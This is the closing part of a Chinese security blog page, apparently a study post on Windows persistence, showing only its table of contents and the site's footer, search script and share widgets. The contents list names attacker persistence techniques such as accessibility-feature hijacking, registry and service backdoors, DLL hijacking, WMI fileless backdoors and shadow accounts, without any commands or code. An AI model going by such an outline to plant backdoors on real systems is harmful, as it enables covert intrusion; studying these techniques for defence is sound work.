        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x1-%E8%BE%85%E5%8A%A9%E5%8A%9F%E8%83%BD%E9%95%9C%E5%83%8F%E5%8A%AB%E6%8C%81"><span class="toc-text">0x1 辅助功能镜像劫持</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x2-%E5%90%AF%E5%8A%A8%E9%A1%B9-x2F-%E6%9C%8D%E5%8A%A1%E5%90%8E%E9%97%A8"><span class="toc-text">0x2.启动项&#x2F;服务后门</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%80%E5%A7%8B%E8%8F%9C%E5%8D%95%E5%90%AF%E5%8A%A8%E9%A1%B9"><span class="toc-text">开始菜单启动项</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%AF%E5%8A%A8%E9%A1%B9%E6%B3%A8%E5%86%8C%E8%A1%A8%E5%90%8E%E9%97%A8"><span class="toc-text">启动项注册表后门</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%87%AA%E5%90%AF%E5%8A%A8%E6%9C%8D%E5%8A%A1%E5%90%8E%E9%97%A8"><span class="toc-text">自启动服务后门</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x3-%E7%B3%BB%E7%BB%9F%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E5%90%8E%E9%97%A8"><span class="toc-text">0x3.系统计划任务后门</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x4-DLL%E5%8A%AB%E6%8C%81"><span class="toc-text">0x4.DLL劫持</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x5-Winlogon%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E5%88%9D%E5%A7%8B%E5%8C%96"><span class="toc-text">0x5.Winlogon用户登录初始化</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x6-Logon-Scripts%E5%90%8E%E9%97%A8"><span class="toc-text">0x6.Logon Scripts后门</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x7-%E6%96%87%E4%BB%B6%E5%85%B3%E8%81%94"><span class="toc-text">0x7.文件关联</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x8-Bitsadmin"><span class="toc-text">0x8.Bitsadmin</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x9-%E5%B1%8F%E5%B9%95%E4%BF%9D%E6%8A%A4%E7%A8%8B%E5%BA%8F"><span class="toc-text">0x9.屏幕保护程序</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0xA-WMI%E6%9E%84%E9%80%A0%E6%97%A0%E6%96%87%E4%BB%B6%E5%90%8E%E9%97%A8%EF%BC%88%E5%BE%85%E5%AE%8C%E6%88%90%EF%BC%89"><span class="toc-text">0xA WMI构造无文件后门（待完成）</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0xB-%E5%BD%B1%E5%AD%90%E7%94%A8%E6%88%B7"><span class="toc-text">0xB.影子用户</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0xC-Netsh"><span class="toc-text">0xC.Netsh</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




                                                                    
                                                                        <div class="comments-container">
                                                                            







                                                                        </div>
                                                                        
                                                            </div>
                                                            
        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/Ghostasky">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
        <li>
          <a title="twitter" target="_blank" rel="noopener" href="https://twitter.com/ghostasky">
            <i class="iconfont icon-twitter"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/Ghostasky">怕什么真理无穷，进一寸有进一寸的欢喜。</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2022 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0 + '&url=' + https%3A%2F%2Fghostasky.github.io%2F2022%2F03%2F08%2FWindows%25E6%259D%2583%25E9%2599%2590%25E7%25BB%25B4%25E6%258C%2581%25E5%25AD%25A6%25E4%25B9%25A0%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://ghostasky.github.io/2022/03/08/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%AD%A6%E4%B9%A0/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
